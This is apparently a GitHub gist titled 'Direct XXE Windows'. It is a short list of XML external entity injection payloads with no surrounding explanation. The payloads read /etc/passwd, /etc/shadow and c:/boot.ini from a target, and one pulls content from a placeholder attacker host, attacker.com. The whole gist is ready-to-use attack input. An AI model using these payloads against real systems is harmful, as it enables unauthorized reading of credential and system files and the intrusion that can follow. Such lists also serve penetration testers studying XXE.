Skip to content

Instantly share code, notes, and snippets.

@S3cur3Th1sSh1t

S3cur3Th1sSh1t/Direct XXE Windows

Last active February 29, 2024 20:25
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save S3cur3Th1sSh1t/e8bbbbe068b4f385576b1741f571de15 to your computer and use it in GitHub Desktop.
Save S3cur3Th1sSh1t/e8bbbbe068b4f385576b1741f571de15 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Direct XXE Windows
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment